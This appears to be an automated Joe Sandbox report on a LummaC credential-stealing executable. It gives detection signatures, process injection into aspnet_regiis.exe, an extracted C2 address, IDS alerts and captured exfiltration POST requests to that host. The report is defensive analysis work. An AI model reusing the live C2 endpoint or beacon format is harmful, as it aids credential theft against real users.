Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
S#U043eftWare.exe

Overview

General Information

Sample name:S#U043eftWare.exe
renamed because original name is a hash value
Original sample name:SftWare.exe
Analysis ID:1561496
MD5:82c56f5e8dcae969405b4f02be0d785a
SHA1:f5e9473db26e5dd800f780b02ccf15e7a66d0d48
SHA256:d37859bc3d96d9dd1304fcb56a9e7225a31fa922e7b4945e7bb18e79fa09256c
Tags:exeuser-4k95m
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • S#U043eftWare.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\S#U043eftWare.exe" MD5: 82C56F5E8DCAE969405B4F02BE0D785A)
    • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 7700 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • WerFault.exe (PID: 7812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1228 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": "https://property-imper.sbs:443/api", "Build Version": "yau6Na--6642475507"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: S#U043eftWare.exe PID: 7624JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      Process Memory Space: aspnet_regiis.exe PID: 7700JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: aspnet_regiis.exe PID: 7700JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: aspnet_regiis.exe PID: 7700JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T15:10:01.104987+010020283713Unknown Traffic192.168.2.449730104.21.33.116443TCP
            2024-11-23T15:10:03.519144+010020283713Unknown Traffic192.168.2.449732104.21.33.116443TCP
            2024-11-23T15:10:05.776218+010020283713Unknown Traffic192.168.2.449734104.21.33.116443TCP
            2024-11-23T15:10:07.941534+010020283713Unknown Traffic192.168.2.449737104.21.33.116443TCP
            2024-11-23T15:10:10.120985+010020283713Unknown Traffic192.168.2.449739104.21.33.116443TCP
            2024-11-23T15:10:12.511308+010020283713Unknown Traffic192.168.2.449741104.21.33.116443TCP
            2024-11-23T15:10:14.988079+010020283713Unknown Traffic192.168.2.449743104.21.33.116443TCP
            2024-11-23T15:10:18.531857+010020283713Unknown Traffic192.168.2.449746104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T15:10:02.212063+010020546531A Network Trojan was detected192.168.2.449730104.21.33.116443TCP
            2024-11-23T15:10:04.247214+010020546531A Network Trojan was detected192.168.2.449732104.21.33.116443TCP
            2024-11-23T15:10:19.241279+010020546531A Network Trojan was detected192.168.2.449746104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T15:10:02.212063+010020498361A Network Trojan was detected192.168.2.449730104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T15:10:04.247214+010020498121A Network Trojan was detected192.168.2.449732104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T15:10:08.719900+010020480941Malware Command and Control Activity Detected192.168.2.449737104.21.33.116443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: C:\Users\user\AppData\Roaming\gdi32.dllAvira: detection malicious, Label: HEUR/AGEN.1301971
            Source: aspnet_regiis.exe.7700.2.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs:443/api", "Build Version": "yau6Na--6642475507"}
            Source: S#U043eftWare.exeReversingLabs: Detection: 26%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
            Source: S#U043eftWare.exeJoe Sandbox ML: detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00948BE3 CryptUnprotectData,2_2_00948BE3
            Source: S#U043eftWare.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: S#U043eftWare.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: %%.pdb source: S#U043eftWare.exe, 00000000.00000002.1997339628.000000000093A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, WER87AC.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WER87AC.tmp.dmp.5.dr
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997339628.000000000093A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Desktop\S#U043eftWare.PDB source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER87AC.tmp.dmp.5.dr
            Source: Binary string: C:\Users\user\Desktop\S#U043eftWare.PDB source: S#U043eftWare.exe, 00000000.00000002.1997339628.000000000093A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbL0 source: WER87AC.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbe source: S#U043eftWare.exe, 00000000.00000002.1997676523.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 4x nop then mov esi, ebx0_2_0051B040
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00552860
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-47412FB0h]0_2_0052F110
            Source: C:\Users\user\Desktop\S#U043eftWare.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0052F110
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, edx2_2_0096D880
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi-000000BEh]2_2_0093A10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-43h]2_2_00950970
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebx2_2_0093D2C5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_00970620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edx+2EBA049Dh]2_2_0093CE5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then lea eax, dword ptr [esp+3Ch]2_2_0093C7A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00948BE3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, esi2_2_00970740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, eax2_2_00970CD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, eax2_2_00935C20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebp, eax2_2_00935C20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00953450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, ebx2_2_00969040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0094AC64
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp al, 5Ch2_2_00932190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp dword ptr [00977FC4h]2_2_00957580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-59BD808Dh]2_2_00957580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00957580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp dword ptr [00975ED4h]2_2_0093B989
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_009531F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h2_2_00956910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov bx, 0008h2_2_00934930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp ecx2_2_00934930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add eax, edx2_2_00956959
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h2_2_00969290
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, edx2_2_0093BEB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-47412FB0h]2_2_0094CED0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0094CED0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, ebx2_2_00938E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+6FB81553h]2_2_0094D201
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp dword ptr [00975ED4h]2_2_0093B626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000F0h]2_2_0093DA43
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_0093EA4F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ebp2_2_009693D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, ecx2_2_00951F10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax+7035CC0Ch]2_2_0094DF00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, esi2_2_00955344
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp dword ptr [00977FC4h]2_2_00957774
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00957774
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_00952776

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49737 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 104.21.33.116:443
            Source: Malware configuration extractorURLs: https://property-imper.sbs:443/api
            Source: Joe Sandbox ViewIP Address: 104.21.33.116 104.21.33.116
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.33.116:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=64RCD7D2DYJM8YJNXNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3UIS0B34M4H4WG9KY7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CJJFV06MJVGS7NFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20424Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5TETUHCUZXBZSQTUK6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1308Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QV5928JTGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569006Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: property-imper.sbs
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
            Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
            Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: aspnet_regiis.exe, 00000002.00000003.1775310035.0000000004BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
            Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: aspnet_regiis.exe, 00000002.00000003.1775310035.0000000004BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: aspnet_regiis.exe, 00000002.00000003.1775310035.0000000004BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
            Source: aspnet_regiis.exe, 00000002.00000003.1878990637.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/BW#?06
            Source: aspnet_regiis.exe, 00000002.00000003.1878990637.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/U
            Source: aspnet_regiis.exe, 00000002.00000003.1819263435.000000000070D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880620617.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
            Source: aspnet_regiis.exe, 00000002.00000003.1879281479.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1879487275.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api;
            Source: aspnet_regiis.exe, 00000002.00000003.1878990637.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/l
            Source: aspnet_regiis.exe, 00000002.00000003.1878990637.0000000000671000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/api
            Source: aspnet_regiis.exe, 00000002.00000003.1731740518.0000000004C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: aspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
